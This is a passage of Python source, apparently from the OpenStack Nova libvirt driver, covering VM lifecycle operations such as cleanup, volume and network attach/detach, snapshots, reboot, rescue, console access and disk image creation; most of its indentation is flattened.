virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug(_("Error from libvirt during undefineFlags."
" Retrying with undefine"), instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_("Error from libvirt during undefine. "
"Code=%(errcode)s Error=%(e)s") %
locals(), instance=instance)
def _cleanup(self, instance, network_info, block_device_info,
destroy_disks):
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.NotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.error(_("Error from libvirt during unfilter. "
"Code=%(errcode)s Error=%(e)s") %
locals(), instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
        # FIXME(wangpan): if the instance is booted again here, such as the
        #                 soft reboot operation booting it here, it will
        #                 become "running deleted"; should we check and destroy
        #                 it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
if destroy_disks:
target = libvirt_utils.get_instance_path(instance)
LOG.info(_('Deleting instance files %(target)s') % locals(),
instance=instance)
if os.path.exists(target):
# If we fail to get rid of the directory
# tree, this shouldn't block deletion of
# the instance as whole.
try:
shutil.rmtree(target)
                except OSError as e:
LOG.error(_("Failed to cleanup directory %(target)s: %(e)s"
) % locals())
#NOTE(bfilippov): destroy all LVM disks for this instance
self._cleanup_lvm(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
libvirt_utils.remove_logical_volumes(*disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt_images_volume_group:
vg = os.path.join('/dev', CONF.libvirt_images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['name']
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = libvirt_utils.list_logical_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
disks = map(fullpath, disk_names)
return disks
return []
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug(_('Could not determine iscsi initiator name'),
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide node names'),
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide port names'),
instance=instance)
if not self._initiator and not self._fc_wwnns and not self._fc_wwpns:
msg = _("No Volume Connector found.")
LOG.error(msg)
raise exception.NovaException(msg)
connector = {'ip': CONF.my_ip,
'initiator': self._initiator,
'host': CONF.host}
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
def _cleanup_resize(self, instance, network_info):
target = libvirt_utils.get_instance_path(instance) + "_resize"
if os.path.exists(target):
shutil.rmtree(target)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def volume_driver_method(self, method_name, connection_info,
*args, **kwargs):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
method = getattr(driver, method_name)
return method(connection_info, *args, **kwargs)
def attach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
        except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
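    # Illustrative note: the helper above returns the serialized <disk> element
    # whose <target dev="..."/> matches the requested device name, e.g. something
    # roughly like <disk type='block' device='disk'>...<target dev='vdb'/>...</disk>
    # when called with device='vdb'.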
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
# NOTE(vish):
LOG.warn(_("During detach_volume, instance disappeared."))
else:
raise
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
@exception.wrap_exception()
def attach_interface(self, instance, image_meta, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
self.firewall_driver.setup_basic_filtering(instance,
[(network, mapping)])
cfg = self.vif_driver.get_config(instance, network, mapping,
image_meta)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
LOG.error(_('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, (network, mapping))
raise exception.InterfaceAttachFailed(instance)
@exception.wrap_exception()
def detach_interface(self, instance, network_info):
virt_dom = self._lookup_by_name(instance['name'])
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance, network, mapping, None)
try:
self.vif_driver.unplug(instance, (network, mapping))
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(instance)
def snapshot(self, context, instance, image_href, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
(image_service, image_id) = glance.get_remote_image_service(
context, instance['image_ref'])
try:
base = image_service.show(context, image_id)
except exception.ImageNotFound:
base = {}
_image_service = glance.get_remote_image_service(context, image_href)
snapshot_image_service, snapshot_image_id = _image_service
snapshot = snapshot_image_service.show(context, snapshot_image_id)
metadata = {'is_public': False,
'status': 'active',
'name': snapshot['name'],
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if 'architecture' in base.get('properties', {}):
arch = base['properties']['architecture']
metadata['properties']['architecture'] = arch
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm as raw
if image_format == 'lvm':
image_format = 'raw'
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = image_format
metadata['container_format'] = base.get('container_format', 'bare')
snapshot_name = uuid.uuid4().hex
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self.has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm":
live_snapshot = True
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
snapshot_name,
image_type=source_format)
if live_snapshot:
LOG.info(_("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_("Beginning cold snapshot process"),
instance=instance)
snapshot_backend.snapshot_create()
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt_snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE (rmk): libvirt needs to be able to write to the
                    # temp directory, which is owned by nova.
utils.execute('chmod', '777', tmpdir, run_as_root=True)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
if not live_snapshot:
snapshot_backend.snapshot_delete()
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
LOG.info(_("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
image_service.update(context,
image_href,
metadata,
image_file)
LOG.info(_("Snapshot image upload complete"),
instance=instance)
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
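        # Helper used below: returns False once blockJobInfo() reports that
        # the copy job's cursor has reached the end (or no job info can be
        # read), and True while the job is still catching up.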
def _wait_for_block_job(domain, disk_path):
status = domain.blockJobInfo(disk_path, 0)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if cur == end and cur != 0 and end != 0:
return False
else:
return True
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while _wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2', None,
out_path, image_format)
def reboot(self, context, instance, network_info, reboot_type='SOFT',
block_device_info=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
if self._soft_reboot(instance):
LOG.info(_("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_("Failed to soft reboot instance."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
        # NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
for x in xrange(CONF.libvirt_wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
new_domid = dom.ID()
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
return True
elif old_domid != new_domid:
LOG.info(_("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
If xml is set, it uses the passed in xml in place of the xml from the
existing domain.
"""
self._destroy(instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self.get_instance_disk_info(instance['name'], xml)
self._create_images_and_backing(context, instance, disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance rebooted successfully."),
instance=instance)
raise utils.LoopingCallDone()
timer = utils.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, instance):
"""Power on the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._create_domain(domain=dom, instance=instance)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
dom.managedSave(0)
def resume(self, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
if self.instance_exists(instance['name']):
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.PAUSED)
if state in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
        should not edit or override the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
rescue_images = {
'image_id': CONF.rescue_image_id or instance['image_ref'],
'kernel_id': CONF.rescue_kernel_id or instance['kernel_id'],
'ramdisk_id': CONF.rescue_ramdisk_id or instance['ramdisk_id'],
}
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
None,
image_meta,
rescue=True)
xml = self.to_xml(instance, network_info, disk_info,
image_meta, rescue=rescue_images)
self._create_image(context, instance, xml,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance['name'])
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self.get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
xml = self.to_xml(instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info)
self._create_image(context, instance, xml,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
LOG.debug(_("Instance is running"), instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance spawned successfully."),
instance=instance)
raise utils.LoopingCallDone()
timer = utils.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_('data: %(data)r, fpath: %(fpath)r') % locals())
        with open(fpath, 'a+') as fp:
            fp.write(data)
        return fpath
def get_console_output(self, instance):
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes '
'ignored'), remaining, instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
port = get_vnc_port_for_instance(instance['name'])
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
@exception.wrap_exception()
def get_spice_console(self, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
return (None, None)
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
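        # Probe by opening a scratch file with O_DIRECT: EINVAL from open()
        # means the filesystem does not support direct I/O; any other error
        # is re-raised.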
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
os.close(f)
LOG.debug(_("Path '%(path)s' supports direct I/O") %
{'path': dirpath})
        except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug(_("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'") %
{'path': dirpath, 'ex': str(e)})
        except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
if not fs_format:
fs_format = CONF.default_ephemeral_format
if not CONF.libvirt_images_type == "lvm":
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
if fs_format:
utils.mkfs(fs_format, target, label)
def _create_ephemeral(self, target, ephemeral_size, fs_label, os_type):
self._create_local(target, ephemeral_size)
disk.mkfs(os_type, fs_label, target)
@staticmethod
def _create_swap(target, swap_mb):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _create_image(self, context, instance, libvirt_xml,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None, admin_pass=None):
if not suffix:
suffix = ''
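        # An instance is treated as volume-backed when it has no image
        # reference or no root 'disk' entry in the disk mapping; no root
        # disk image is fetched for it further down.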
booted_from_volume = (
(not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping
)
# syntactic nicety
def basepath(fname='', suffix=suffix):
return os.path.join(libvirt_utils.get_instance_path(instance),
fname + suffix)
def image(fname, image_type=CONF.libvirt_images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(basepath(suffix=''))
LOG.info(_('Creating image'), instance=instance)
libvirt_utils.write_to_file(basepath('libvirt.xml'), libvirt_xml)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
        # NOTE(vish): No need to add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 007)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = instance_types.extract_instance_type(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * 1024 * 1024 * 1024
if size == 0 or suffix == '.rescue':
size = None
image('disk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = instance['os_type']
if not os_type_with_default:
os_type_with_default = 'default'
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"])
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * 1024 * 1024 * 1024
image('disk.local').cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for eph in driver.block_device_info_get_ephemerals(block_device_info):
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % eph['num'],
os_type=instance["os_type"])
size = eph['size'] * 1024 * 1024 * 1024
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
image(blockinfo.get_eph_disk(eph)).cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'])
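        # The swap size comes from the block device mapping when it is
        # usable; otherwise it falls back to the instance type's swap, but
        # only when the swap device is not already supplied as a mapped
        # volume.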
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * 1024 * 1024
image('disk.swap').cache(fetch_func=self._create_swap,
